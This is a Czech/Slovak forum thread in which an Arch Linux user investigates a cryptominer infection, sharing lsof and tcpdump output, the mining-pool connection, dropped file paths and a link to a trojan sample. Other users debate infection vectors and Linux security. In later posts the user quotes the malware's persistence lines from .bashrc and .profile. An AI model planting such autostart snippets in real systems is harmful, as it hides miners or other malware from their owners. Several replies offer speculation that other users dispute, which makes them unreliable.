Podivný proces (initctl) v /tmp

[j]

dnes som si nahodou vo vystupe htop vsimol proces, ktory zral 100 % cpu. podivny bol jeho nazov: /tmp/F441-D751-2188-F374/initctl. velkost 2492 kB a vo vnutri retazec GCC (Ubuntu 6.4.0-8ubuntu1). nakolko bezim na archu, vacsinu veci kompilujem, zacinal som mat zle tusenie.

vo vystupe lsof sa objavila takyto zaznam:

Kód: [Vybrat]

.. TCP mypc:42454->100.ip-142-44-242.net:14444 (ESTABLISHED)

spustil som teda tcpdump:

Kód: [Vybrat]

100.ip-142-44-242.net.14444 -> mypc.42454 {"jsonrpc":"2.0","method":"job","params":{"blob":"0707f..

Podla googlu to vyzera na nejaky kryptominer. Preventivne som odpojil PC od netu, kazdopadne ostava viacero otazok:

• ako som sa nakazil?
• co je vsetko kompromitovane?
• ako sa nakazy zbavit?

budem vdacny za kazdu radu. arch linux, 64bit.

j

[Reklama]

[samalama]

pod akym userom to bezalo/kto je vlastnikom suboru?

[kkt1]

Jak si se nakazil je tezke rict bez logu a ty logy uz nemusi byt validni. Patrne nejaky otevreny port a nejaka zranitelnost. Co vse je kompromitovane? Tezko rict, obecne receno vse. Jak se toho zbavit? Cista instalace a obnova uzivatelskych dat ze zalohy je nejlepsi volba. Nevis co vse je napadene.

[_Tomáš_]

nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...

To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.

Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.

[Filip Jirsák]

nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód,

Opravdu? Jak je možné v prohlížeči jen tak spustit libovolný kód?

který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root

Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe

Jak router jen tak nakazil počítač v síti? Nejsnáz asi kapénkovou infekcí…

To ale pouze střílím

To je to jediné, s čím se dá souhlasit.

[Reklama]

[j]

tak nieco sa podarilo zistit. proces bezi pod mojim userom. a vyzera to na https://www.reddit.com/r/linuxmasterrace/comments/8dx7nj/psa_please_check_if/. blbe je, ze aj ked som .desktop subor zmazal, objavil sa (po reboote) v /tmp novy proces. je skratka celkom odolny. nakazil som sa niekedy koncom aprila, co celkom dobre ilustruje aj graf teploty cpu (monitorix) - nakolko aj pri "idle" skocil o 10 stupnov hore.

dakujem za komenty. ked zistim viac, pridam. j

[bakakaika]

Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné.  Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.

Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.

[j]

hmm... tak v .bashrc mam takyto skvost:
linux_bash="$HOME/.ssh/service/ssh-agent"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi

a v .profile pre istotu este raz ale trochu inak:
linux_bash="$HOME/.cache/totem/service/totem-daemon"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi

uz na nete nachadzam k tejto teme celkom dost prispevkov..

[j]

a kde vsade sa nas..

$ sudo find ~myuser -size 2227632c
/home/myuser/.local/share/accounts/services/dbus-daemon
/home/myuser/.local/share/icc/icc-daemon
/home/myuser/.cache/totem/service/totem-daemon
/home/myuser/.ssh/service/ssh-agent

[j]

a keby sa s tym chcel niekto hrat: https://github.com/Saren-Arterius/dbus-daemon-trojan-sample

akurat premyslam, ci sa to tu spominalo v Postrehoch z bezpecnosti

[bakakaika]

nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...

To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.

Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.

Píšete blbosti, bylo vyvedeno dost úsilí aby někdo nemohl jen tak spustit libovolný kod po navštívení webove stranky. A i pokud mate otevreny port, stale potrebujete něco co na něm poslouchá s nějakou zranitelností, která nebyla patchnuta.

Jinak na webu se píše, že byl nakažený nějaký plugin pro přehrávač na Archu (Kodi), to mi spíš příjde jako rozumný attack vector.

[Filip Jirsák]

Skodlivy kod behici pod userem je dost pruser

To nezpochybňuju. Jenže AoK se v tom komentáři nedostal ani k tomu. Tam to bylo samé 1. prohlížeč 2. ? 3. průnik nebo 1. uživatelský proces 2. ? 3. root.

[Youda]

RHEL defaultne montuje /tmp s noexec flagem, divim se,zeje to jinde jinak.

[Youda]

Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné.  Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.

Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.

Selinux, Apparmor a CGroups byly vymyslene v osmdesatkach? To jsem nevedel

[Fanda]

To akoze linux este furt nespusta aplikacie v sandboxe a akakolvek derava apka moze kompromitovat cele ~ ? Ze vas to bavi sa hrat s ohnom a este mat reci o nasadeni linux desktopu vo firmach...